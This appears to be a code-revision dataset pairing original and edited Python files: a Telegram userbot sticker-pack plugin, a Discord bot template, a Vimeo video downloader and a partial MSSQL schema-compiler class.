             f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
             f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
    await event.edit(OUTPUT)
# Register the help text for this plugin with the global help index.
CMD_HELP.update({
    "stickers":
    ".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.utils import admin_cmd
import emoji
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
# Status messages shown (picked at random) while a sticker is being kanged.
KANGING_STR = [
    "Using Witchery to kang this sticker...",
    "Plagiarising hehe...",
    "Inviting this sticker over to my pack...",
    "Kanging this sticker...",
    "Hey that's a nice sticker!\nMind if I kang?!..",
    "hehe me stel ur stikér\nhehe.",
    "Ay look over there (☉。☉)!→\nWhile I kang this...",
    "Roses are red violets are blue, kanging this sticker so my pacc looks cool",
    "Imprisoning this sticker...",
    "Mr.Steal Your Sticker is stealing this sticker... ",
]
@borg.on(admin_cmd(pattern="kang ?(.*)"))
async def kang(args):
    """ For .kang command, kangs stickers or creates new ones. """
    user = await bot.get_me()
    if not user.username:
        # No public username: reuse the first name when it is plain ASCII,
        # otherwise fall back to a synthetic id-based name.
        try:
            user.first_name.encode('utf-8').decode('ascii')
            user.username = user.first_name
        except UnicodeDecodeError:
            user.username = f"cat_{user.id}"
    message = await args.get_reply_message()
    photo = None
    emojibypass = False
    is_anim = False
    emoji = None
    if message and message.media:
        if isinstance(message.media, MessageMediaPhoto):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            photo = await bot.download_media(message.photo, photo)
        elif "image" in message.media.document.mime_type.split('/'):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            await bot.download_file(message.media.document, photo)
            if (DocumentAttributeFilename(file_name='sticker.webp') in
                    message.media.document.attributes):
                # Re-kanged webp sticker: reuse its original emoji.
                emoji = message.media.document.attributes[1].alt
                emojibypass = True
        elif "tgsticker" in message.media.document.mime_type:
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            await bot.download_file(message.media.document,
                                    'AnimatedSticker.tgs')
            attributes = message.media.document.attributes
            for attribute in attributes:
                if isinstance(attribute, DocumentAttributeSticker):
                    emoji = attribute.alt
                    emojibypass = True
            is_anim = True
            photo = 1
        else:
            await args.edit("`Unsupported File!`")
            return
    else:
        await args.edit("`I can't kang that...`")
        return
    if photo:
        # Parse optional "[emoji] [pack-number]" arguments (either order).
        splat = args.text.split()
        if not emojibypass:
            emoji = "😂"
        pack = 1
        if len(splat) == 3:
            if char_is_emoji(splat[1]):
                pack = splat[2]  # User sent both
                emoji = splat[1]
            elif char_is_emoji(splat[2]):
                pack = splat[1]  # User sent both
                emoji = splat[2]
            else:
                await args.edit("check `.info stickers`")
                return
        elif len(splat) == 2:
            if char_is_emoji(splat[1]):
                emoji = splat[1]
            else:
                pack = splat[1]
        packname = f"{user.username}_{pack}"
        packnick = f"@{user.username}'s_{pack}"
        cmd = '/newpack'
        file = io.BytesIO()
        if not is_anim:
            image = await resize_photo(photo)
            file.name = "sticker.png"
            image.save(file, "PNG")
        else:
            packname += "_anim"
            packnick += " (Animated)"
            cmd = '/newanimated'
        # Probe the public pack page to learn whether the pack exists.
        response = urllib.request.urlopen(
            urllib.request.Request(f'http://t.me/addstickers/{packname}'))
        htmlstr = response.read().decode("utf8").split('\n')
        if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
            # Pack already exists: append this sticker to it.
            async with bot.conversation('Stickers') as conv:
                await conv.send_message('/addsticker')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packname)
                x = await conv.get_response()
                while "Whoa! That's probably enough stickers for one pack, give it a break" in x.text:
                    # Pack is full: roll over to the next numbered pack.
                    # BUGFIX: `pack` may be the int default or a numeric
                    # string from user input; the old `pack.isnumeric()`
                    # raised AttributeError on ints and `pack += 1` raised
                    # TypeError on strings. Normalise first.
                    if str(pack).isnumeric():
                        pack = int(pack) + 1
                    else:
                        pack = 1
                    packname = f"{user.username}_{pack}"
                    packnick = f"@{user.username}'s_{pack}"
                    await args.edit("`Switching to Pack " + str(pack) +
                                    " due to insufficient space`")
                    await conv.send_message(packname)
                    x = await conv.get_response()
                    if x.text == "Invalid pack selected.":
                        # The rolled-over pack doesn't exist yet: create it.
                        await conv.send_message(cmd)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message(packnick)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        if is_anim:
                            await conv.send_file('AnimatedSticker.tgs')
                            remove('AnimatedSticker.tgs')
                        else:
                            file.seek(0)
                            await conv.send_file(file, force_document=True)
                        rsp = await conv.get_response()
                        if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
                            await bot.send_read_acknowledge(conv.chat_id)
                            # BUGFIX: was `rsp.txt`, which raised AttributeError.
                            await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
                            return
                        await conv.send_message(emoji)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message("/publish")
                        if is_anim:
                            await conv.get_response()
                            await conv.send_message(f"<{packnick}>")
                        # Ensure user doesn't get spamming notifications
                        await conv.get_response()
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message("/skip")
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message(packname)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await args.edit(f"Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker added is {emoji}",
                                        parse_mode='md')
                        return
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
                    await bot.send_read_acknowledge(conv.chat_id)
                    await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message('/done')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        else:
            # Pack does not exist yet: create it from scratch.
            await args.edit("`Brewing a new Pack...`")
            async with bot.conversation('Stickers') as conv:
                await conv.send_message(cmd)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packnick)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
                    # CONSISTENCY FIX: report rsp.text like the other branches
                    # (was the raw Message object repr).
                    await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message("/publish")
                if is_anim:
                    await conv.get_response()
                    await conv.send_message(f"<{packnick}>")
                # Ensure user doesn't get spamming notifications
                await conv.get_response()
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message("/skip")
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message(packname)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        await args.edit(f"Sticker kanged successfully!\
\nPack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker is {emoji}",
                        parse_mode='md')
async def resize_photo(photo):
    """
    Resize the given photo so it fits within 512x512 (Telegram sticker
    dimensions), preserving the aspect ratio.

    BUGFIX: the old test ``(image.width and image.height) < 512`` only
    compared the height (``and`` yields its second operand), not both
    dimensions as intended.
    """
    image = Image.open(photo)
    maxsize = (512, 512)
    if image.width < 512 and image.height < 512:
        # Small image: scale up so the larger side becomes exactly 512.
        scale = 512 / max(image.width, image.height)
        new_size = (math.floor(image.width * scale),
                    math.floor(image.height * scale))
        image = image.resize(new_size)
    else:
        # Large image: shrink in place, keeping the aspect ratio.
        image.thumbnail(maxsize)
    return image
def char_is_emoji(character):
    """Return True when *character* appears in the emoji lookup table."""
    known_emoji = emoji.UNICODE_EMOJI
    return character in known_emoji
@borg.on(admin_cmd(pattern="stkrinfo$"))
async def get_pack_info(event):
    """Reply to a sticker with .stkrinfo to show its pack's details."""
    if not event.is_reply:
        await event.edit("`I can't fetch info from nothing, can I ?!`")
        return
    replied = await event.get_reply_message()
    if not replied.document:
        await event.edit("`Reply to a sticker to get the pack details`")
        return
    try:
        sticker_attr = replied.document.attributes[1]
        await event.edit(
            "`Fetching details of the sticker pack, please wait..`")
    except BaseException:
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    if not isinstance(sticker_attr, DocumentAttributeSticker):
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    sticker_set = await bot(
        GetStickerSetRequest(
            InputStickerSetID(
                id=sticker_attr.stickerset.id,
                access_hash=sticker_attr.stickerset.access_hash,
            )
        )
    )
    # Collect the distinct emojis in first-seen order.
    seen_emojis = []
    for entry in sticker_set.packs:
        if entry.emoticon not in seen_emojis:
            seen_emojis.append(entry.emoticon)
    details = (
        f"**Sticker Title:** `{sticker_set.set.title}\n`"
        f"**Sticker Short Name:** `{sticker_set.set.short_name}`\n"
        f"**Official:** `{sticker_set.set.official}`\n"
        f"**Archived:** `{sticker_set.set.archived}`\n"
        f"**Stickers In Pack:** `{len(sticker_set.packs)}`\n"
        f"**Emojis In Pack:**\n{' '.join(seen_emojis)}"
    )
    await event.edit(details)
# Register the help text for this plugin with the global help index.
CMD_HELP.update({
    "stickers":
    ".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
|
from __future__ import annotations
import datetime
import os
from typing import Type
import asyncpg
import discord
from discord.ext import commands
from ..utils import Config
__all__ = ("TemplateBot",)
class TemplateBot(commands.AutoShardedBot):
"""
A template bot, comes with dynamic prefixes
Attributes:
startup (datetime): The datetime instance of when the bot was started
config: (Config): The config handler for the bot
prefix_cache (dict): The prefix cache, used to stop unnecessary queries
"""
def __init__(self, *args, **kwargs):
self.startup: datetime.datetime = datetime.datetime.utcnow()
self.config = Config.from_file("config.ini")
self.prefix_cache = {}
super().__init__(
self.get_prefix,
intents=discord.Intents.default(),
case_insensitive=True,
chunk_guilds_at_startup=False,
allowed_mentions=discord.AllowedMentions(everyone=False, roles=False),
*args,
**kwargs,
)
async def _create_database(self):
"""
Makes the connection to postgres
And creates the tables if they don't exist
"""
self.pool = await asyncpg.create_pool(
database=self.config["db"]["name"],
user=self.config["db"]["user"],
password=self.config["db"]["password"],
)
with open("schema.sql") as file:
await self.pool.execute(file.read())
async def get_prefix(self, message: discord.Message) -> str:
"""
This method returns the prefix that is connected to the guild.
Args:
message (discord.Message): The discord.Message instance
Returns:
str: The prefix
"""
try:
cached_prefix = self.prefix_cache.get(message.guild.id)
if not cached_prefix:
async with self.pool.acquire() as conn:
data = await conn.fetchrow(
"SELECT prefix FROM guilds WHERE id = $1", message.guild.id
)
self.prefix_cache[message.guild.id] = data[0]
return data[0]
else:
return cached_prefix
except TypeError:
return self.config["bot"]["prefix"]
def run(self):
"""
Runs the bot
Raises:
error: Raised if anything wrong happens during making a connection to postgres
"""
try:
self.loop.run_until_complete(self._create_database())
except Exception as error:
raise error
for cog in [
f"src.cogs.{cog.replace(".py", "")}"
for cog in os.listdir("src/cogs")
if cog != "__pycache__"
]:
self.load_extension(cog)
super().run(self.config["bot"]["token"])
def get_message(self, message_id: int) -> discord.Message:
"""
Used to get a discord.Message instance without fetching
Args:
message_id (int): The messages id
Returns:
discord.Message: The corresponding discord.Message instance
"""
return self._connection._get_message(message_id)
async def getch(self, user_id: int) -> discord.User:
"""
A helper method that first tries grabbing from cache, if that returns None it fetches
Args:
user_id (int): The users id
Returns:
discord.User: The corresponding discord.User instance
"""
user = self.get_user(user_id) or await self.fetch_user(user_id)
return user
@property
def avatar(self) -> discord.Asset:
"""
The bots avatar
Returns:
discord.Asset: The corresponding discord.Asset instance
"""
return self.user.avatar_url
@property
def uptime(self):
"""
The bots uptime
Returns:
int: The bots uptime in seconds
"""
return (datetime.datetime.utcnow() - self.startup).total_seconds()
| from __future__ import annotations
import datetime
import os
from typing import Type
import asyncpg
import discord
from discord.ext import commands
from ..utils import Config
__all__ = ("TemplateBot",)
class TemplateBot(commands.AutoShardedBot):
"""
A template bot, comes with dynamic prefixes
Attributes:
startup (datetime): The datetime instance of when the bot was started
config: (Config): The config handler for the bot
prefix_cache (dict): The prefix cache, used to stop unnecessary queries
"""
def __init__(self, *args, **kwargs):
self.startup: datetime.datetime = datetime.datetime.utcnow()
self.config = Config.from_file("config.ini")
self.prefix_cache = {}
super().__init__(
self.get_prefix,
intents=discord.Intents.default(),
case_insensitive=True,
chunk_guilds_at_startup=False,
allowed_mentions=discord.AllowedMentions(everyone=False, roles=False),
*args,
**kwargs,
)
async def _create_database(self):
"""
Makes the connection to postgres
And creates the tables if they don't exist
"""
self.pool = await asyncpg.create_pool(
database=self.config["db"]["name"],
user=self.config["db"]["user"],
password=self.config["db"]["password"],
)
with open("schema.sql") as file:
await self.pool.execute(file.read())
async def get_prefix(self, message: discord.Message) -> str:
"""
This method returns the prefix that is connected to the guild.
Args:
message (discord.Message): The discord.Message instance
Returns:
str: The prefix
"""
try:
cached_prefix = self.prefix_cache.get(message.guild.id)
if not cached_prefix:
async with self.pool.acquire() as conn:
data = await conn.fetchrow(
"SELECT prefix FROM guilds WHERE id = $1", message.guild.id
)
self.prefix_cache[message.guild.id] = data[0]
return data[0]
else:
return cached_prefix
except TypeError:
return self.config["bot"]["prefix"]
def run(self):
"""
Runs the bot
Raises:
error: Raised if anything wrong happens during making a connection to postgres
"""
try:
self.loop.run_until_complete(self._create_database())
except Exception as error:
raise error
for cog in [
f"src.cogs.{cog.replace('.py', '')}"
for cog in os.listdir("src/cogs")
if cog != "__pycache__"
]:
self.load_extension(cog)
super().run(self.config["bot"]["token"])
def get_message(self, message_id: int) -> discord.Message:
"""
Used to get a discord.Message instance without fetching
Args:
message_id (int): The messages id
Returns:
discord.Message: The corresponding discord.Message instance
"""
return self._connection._get_message(message_id)
async def getch(self, user_id: int) -> discord.User:
"""
A helper method that first tries grabbing from cache, if that returns None it fetches
Args:
user_id (int): The users id
Returns:
discord.User: The corresponding discord.User instance
"""
user = self.get_user(user_id) or await self.fetch_user(user_id)
return user
@property
def avatar(self) -> discord.Asset:
"""
The bots avatar
Returns:
discord.Asset: The corresponding discord.Asset instance
"""
return self.user.avatar_url
@property
def uptime(self):
"""
The bots uptime
Returns:
int: The bots uptime in seconds
"""
return (datetime.datetime.utcnow() - self.startup).total_seconds()
|
import json
import os
import re
import time
import urllib.request
class VimeoScraper:
    '''
    Scraping Vimeo videos

    Args:
        out_path: [Optional] str, Path to output directory. If unspecified, current directory will be used
    '''

    def __init__(self, out_path=None):
        if out_path is not None:
            assert os.path.isdir(out_path), "Invalid output directory"
        self.out_path = out_path

    def scrape(self, url, quality, proxies=None):
        '''
        Scraper function for Vimeo

        Args:
            url: URL of vimeo video to be scraped
            quality: Output video resolution (must match one offered by the video)
            proxies: dict, A dictionary containing proxy information

        Raises:
            ValueError: If the video URL is invalid/unreachable, or the
                requested resolution is not available for this video.
        '''
        video_id = url.split('/')[-1]
        try:
            req = urllib.request.Request(f'https://player.vimeo.com/video/{video_id}/config?default_to_hd=1')
            # The player config endpoint rejects clients without a
            # browser-like User-Agent.
            req.add_header('User-Agent',
                           'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17')
            if proxies:
                handler = urllib.request.ProxyHandler(proxies)
                opener = urllib.request.build_opener(handler)
                urllib.request.install_opener(opener)
            resp = urllib.request.urlopen(req)
            json_contents = json.load(resp)
        except Exception as exc:
            # Chain the original failure so callers can see the root cause.
            raise ValueError("Invalid video URL") from exc
        title = json_contents['video']['title']
        file_dicts = json_contents['request']['files']['progressive']
        available_res = [d['quality'] for d in file_dicts]
        if quality not in available_res:
            # ','.join uses quotes distinct from the f-string's so this
            # remains valid on Python < 3.12.
            raise ValueError(
                f"{quality} is not available for this video. {','.join(available_res)} resolutions are available")
        for d in file_dicts:
            if d['quality'] == quality:
                print('-' * 75)
                print("Starting download")
                start_time = time.time()
                # Strip non-alphanumerics so the title is a safe filename.
                title = re.sub(r'[\W_]+', '', title)
                urllib.request.urlretrieve(d['url'],
                                           f"{self.out_path}/{title}-{quality}.mp4" if self.out_path else f"{title}-{quality}.mp4")
                print(f"Download completed in {time.time() - start_time}s")
                print('-' * 75)
| import json
import os
import re
import time
import urllib.request
class VimeoScraper:
    '''
    Scraping Vimeo videos
    Args:
        out_path: [Optional] str, Path to output directory. If unspecified, current directory will be used
    '''
    def __init__(self, out_path=None):
        if out_path is not None:
            assert os.path.isdir(out_path), "Invalid output directory"
        self.out_path = out_path
    def scrape(self, url, quality, proxies=None):
        '''
        Scraper function for Vimeo
        Args:
            url: URL of vimeo video to be scraped
            quality: Output video resolution
            proxies: dict, A dictionary containing proxy information
        Raises:
            ValueError: On an invalid/unreachable URL or unavailable resolution.
        '''
        video_id = url.split('/')[-1]
        # NOTE(review): redundant self-assignment, kept to avoid code changes.
        quality = quality
        try:
            req = urllib.request.Request(f'https://player.vimeo.com/video/{video_id}/config?default_to_hd=1')
            # Browser-like User-Agent; the config endpoint rejects bare clients.
            req.add_header('User-Agent',
                           'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17')
            if proxies:
                handler = urllib.request.ProxyHandler(proxies)
                opener = urllib.request.build_opener(handler)
                urllib.request.install_opener(opener)
            resp = urllib.request.urlopen(req)
            json_contents = json.load(resp)
        except Exception:
            # Any network/parse failure is reported as a bad URL.
            raise ValueError("Invalid video URL")
        title = json_contents['video']['title']
        file_dicts = json_contents['request']['files']['progressive']
        available_res = [d['quality'] for d in file_dicts]
        if quality in available_res:
            for d in file_dicts:
                if d['quality'] == quality:
                    print('-' * 75)
                    print("Starting download")
                    start_time = time.time()
                    # Strip non-alphanumerics so the title is a safe filename.
                    title = re.sub(r'''[\W_]+''', '', title)
                    urllib.request.urlretrieve(d['url'],
                                               f"{self.out_path}/{title}-{quality}.mp4" if self.out_path else f"{title}-{quality}.mp4")
                    print(f"Download completed in {time.time() - start_time}s")
                    print('-' * 75)
        else:
            raise ValueError(
                f"{quality} is not available for this video. {','.join(available_res)} resolutions are available")
|
from .Platform import Platform
from ..Table import Table
class MSSQLPlatform(Platform):
    """Compiles schema-builder operations into Microsoft SQL Server DDL."""

    # Column types whose DDL never carries an explicit length.
    types_without_lengths = [
        "integer",
        "big_integer",
        "tiny_integer",
        "small_integer",
        "medium_integer",
    ]

    # Builder type name -> SQL type keyword.
    # NOTE(review): several entries (MEDIUMINT, LONGBLOB, LONGTEXT, YEAR,
    # BOOLEAN, DOUBLE, JSON, GEOMETRY, POINT) are not native T-SQL types --
    # confirm intended behavior before relying on them.
    type_map = {
        "string": "VARCHAR",
        "char": "CHAR",
        "integer": "INT",
        "big_integer": "BIGINT",
        "tiny_integer": "TINYINT",
        "big_increments": "BIGINT IDENTITY",
        "small_integer": "SMALLINT",
        "medium_integer": "MEDIUMINT",
        "increments": "INT IDENTITY",
        "uuid": "CHAR",
        "binary": "LONGBLOB",
        "boolean": "BOOLEAN",
        "decimal": "DECIMAL",
        "double": "DOUBLE",
        "enum": "VARCHAR",
        "text": "TEXT",
        "float": "FLOAT",
        "geometry": "GEOMETRY",
        "json": "JSON",
        "jsonb": "LONGBLOB",
        "inet": "VARCHAR",
        "cidr": "VARCHAR",
        "macaddr": "VARCHAR",
        "long_text": "LONGTEXT",
        "point": "POINT",
        "time": "TIME",
        "timestamp": "DATETIME",
        "date": "DATE",
        "year": "YEAR",
        "datetime": "DATETIME",
        "tiny_increments": "TINYINT IDENTITY",
        "unsigned": "INT",
        "unsigned_integer": "INT",
    }

    # Nullability flag -> SQL fragment.
    premapped_nulls = {True: "NULL", False: "NOT NULL"}

    # Named default values -> SQL DEFAULT clause.
    premapped_defaults = {
        "current": " DEFAULT CURRENT_TIMESTAMP",
        "now": " DEFAULT NOW()",
        "null": " DEFAULT NULL",
    }

    def compile_create_sql(self, table):
        """Return the statements creating *table* plus any of its indexes."""
        sql = []
        sql.append(
            self.create_format().format(
                table=self.wrap_table(table.name),
                columns=", ".join(self.columnize(table.get_added_columns())).strip(),
                constraints=", "
                + ", ".join(self.constraintize(table.get_added_constraints(), table))
                if table.get_added_constraints()
                else "",
                foreign_keys=", "
                + ", ".join(
                    self.foreign_key_constraintize(table.name, table.added_foreign_keys)
                )
                if table.added_foreign_keys
                else "",
            )
        )
        if table.added_indexes:
            for name, index in table.added_indexes.items():
                sql.append(
                    "CREATE INDEX {name} ON {table}({column})".format(
                        name=index.name,
                        table=self.wrap_table(table.name),
                        column=",".join(index.column),
                    )
                )
        return sql

    def compile_alter_sql(self, table):
        """Return the statements applying every pending change on *table*."""
        sql = []
        if table.added_columns:
            sql.append(
                self.alter_format().format(
                    table=self.wrap_table(table.name),
                    columns="ADD "
                    + ", ".join(self.columnize(table.added_columns)).strip(),
                )
            )
        if table.changed_columns:
            sql.append(
                self.alter_format().format(
                    table=self.wrap_table(table.name),
                    columns="ALTER COLUMN "
                    + ", ".join(self.columnize(table.changed_columns)).strip(),
                )
            )
        if table.renamed_columns:
            for name, column in table.get_renamed_columns().items():
                sql.append(
                    self.rename_column_string(table.name, name, column.name).strip()
                )
        if table.dropped_columns:
            dropped_sql = []
            for name in table.get_dropped_columns():
                dropped_sql.append(self.drop_column_string().format(name=name).strip())
            sql.append(
                self.alter_format().format(
                    table=self.wrap_table(table.name),
                    columns="DROP COLUMN " + ", ".join(dropped_sql),
                )
            )
        if table.added_foreign_keys:
            for (
                column,
                foreign_key_constraint,
            ) in table.get_added_foreign_keys().items():
                cascade = ""
                if foreign_key_constraint.delete_action:
                    cascade += f" ON DELETE {self.foreign_key_actions.get(foreign_key_constraint.delete_action.lower())}"
                if foreign_key_constraint.update_action:
                    cascade += f" ON UPDATE {self.foreign_key_actions.get(foreign_key_constraint.update_action.lower())}"
                sql.append(
                    f"ALTER TABLE {self.wrap_table(table.name)} ADD "
                    + self.get_foreign_key_constraint_string().format(
                        clean_column=column,
                        constraint_name=foreign_key_constraint.constraint_name,
                        column=self.wrap_table(column),
                        table=table.name,
                        foreign_table=foreign_key_constraint.foreign_table,
                        foreign_column=self.wrap_table(
                            foreign_key_constraint.foreign_column
                        ),
                        cascade=cascade,
                    )
                )
        if table.dropped_foreign_keys:
            constraints = table.dropped_foreign_keys
            for constraint in constraints:
                sql.append(
                    f"ALTER TABLE {self.wrap_table(table.name)} DROP CONSTRAINT {constraint}"
                )
        if table.added_indexes:
            for name, index in table.added_indexes.items():
                sql.append(
                    "CREATE INDEX {name} ON {table}({column})".format(
                        name=index.name,
                        table=self.wrap_table(table.name),
                        column=",".join(index.column),
                    )
                )
        if table.removed_indexes:
            constraints = table.removed_indexes
            for constraint in constraints:
                sql.append(
                    f"DROP INDEX {self.wrap_table(table.name)}.{self.wrap_table(constraint)}"
                )
        if table.added_constraints:
            for name, constraint in table.added_constraints.items():
                # ','.join uses quotes distinct from the enclosing f-string's
                # so these lines stay valid on Python < 3.12.
                if constraint.constraint_type == "unique":
                    sql.append(
                        f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} UNIQUE({','.join(constraint.columns)})"
                    )
                elif constraint.constraint_type == "fulltext":
                    # Full-text indexes are not handled for MSSQL.
                    pass
                elif constraint.constraint_type == "primary_key":
                    sql.append(
                        f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} PRIMARY KEY ({','.join(constraint.columns)})"
                    )
        return sql

    def add_column_string(self):
        """Template for an added column inside an ALTER statement."""
        return "{name} {data_type}{length}"

    def drop_column_string(self):
        """Template for a dropped column inside an ALTER statement."""
        return "{name}"

    def rename_column_string(self, table, old, new):
        """Return the sp_rename call that renames *old* to *new* on *table*."""
        return f"EXEC sp_rename '{table}.{old}', '{new}', 'COLUMN'"

    def columnize(self, columns):
        """Render each column object into its full DDL fragment."""
        sql = []
        for name, column in columns.items():
            if column.length:
                length = self.create_column_length(column.column_type).format(
                    length=column.length
                )
            else:
                length = ""
            default = ""
            # A default of 0 is falsy, so it needs its own branch ahead of
            # the generic truthiness checks below.
            if column.default in (0,):
                default = f" DEFAULT {column.default}"
            elif column.default in self.premapped_defaults.keys():
                default = self.premapped_defaults.get(column.default)
            elif column.default:
                if isinstance(column.default, (str,)):
                    default = f" DEFAULT '{column.default}'"
                else:
                    default = f" DEFAULT {column.default}"
            else:
                default = ""
            constraint = ""
            column_constraint = ""
            if column.primary:
                constraint = " PRIMARY KEY"
            if column.column_type == "enum":
                # MSSQL has no ENUM; emulate it with a CHECK constraint.
                values = ", ".join(f"'{x}'" for x in column.values)
                column_constraint = f" CHECK([{column.name}] IN ({values}))"
            sql.append(
                self.columnize_string()
                .format(
                    name=column.name,
                    data_type=self.type_map.get(column.column_type, ""),
                    column_constraint=column_constraint,
                    length=length,
                    constraint=constraint,
                    nullable=self.premapped_nulls.get(column.is_null) or "",
                    default=default,
                )
                .strip()
            )
        return sql

    def columnize_string(self):
        """Template for a single column definition ([name] quoting style)."""
        return "[{name}] {data_type}{length} {nullable}{default}{column_constraint}{constraint}"

    def constraintize(self, constraints, table):
        """Render table-level constraints via their per-type templates."""
        sql = []
        for name, constraint in constraints.items():
            sql.append(
                getattr(
                    self, f"get_{constraint.constraint_type}_constraint_string"
                )().format(
                    columns=", ".join(constraint.columns),
                    name_columns="_".join(constraint.columns),
                    constraint_name=constraint.name,
                    table=table.name,
                )
            )
        return sql

    def get_table_string(self):
        """Template used to quote a table name."""
        return "[{table}]"

    def create_format(self):
        """Template for CREATE TABLE statements."""
        return "CREATE TABLE {table} ({columns}{constraints}{foreign_keys})"

    def alter_format(self):
        """Template for ALTER TABLE statements."""
        return "ALTER TABLE {table} {columns}"

    def get_foreign_key_constraint_string(self):
        """Template for a FOREIGN KEY constraint clause."""
        return "CONSTRAINT {constraint_name} FOREIGN KEY ({column}) REFERENCES {foreign_table}({foreign_column}){cascade}"

    def get_primary_key_constraint_string(self):
        """Template for a PRIMARY KEY constraint clause."""
        return "CONSTRAINT {constraint_name} PRIMARY KEY ({columns})"

    def get_unique_constraint_string(self):
        """Template for a UNIQUE constraint clause."""
        return "CONSTRAINT {constraint_name} UNIQUE ({columns})"

    def compile_table_exists(self, table, database):
        """Query that returns rows iff *table* exists."""
        return f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '{table}'"

    def compile_truncate(self, table, foreign_keys=False):
        """TRUNCATE *table*, optionally disabling FK checks around it."""
        if not foreign_keys:
            return f"TRUNCATE TABLE {self.wrap_table(table)}"
        return [
            f"ALTER TABLE {self.wrap_table(table)} NOCHECK CONSTRAINT ALL",
            f"TRUNCATE TABLE {self.wrap_table(table)}",
            f"ALTER TABLE {self.wrap_table(table)} WITH CHECK CHECK CONSTRAINT ALL",
        ]

    def compile_rename_table(self, current_name, new_name):
        """Rename a table via sp_rename."""
        return f"EXEC sp_rename {self.wrap_table(current_name)}, {self.wrap_table(new_name)}"

    def compile_drop_table_if_exists(self, table):
        """DROP TABLE IF EXISTS statement."""
        return f"DROP TABLE IF EXISTS {self.wrap_table(table)}"

    def compile_drop_table(self, table):
        """DROP TABLE statement."""
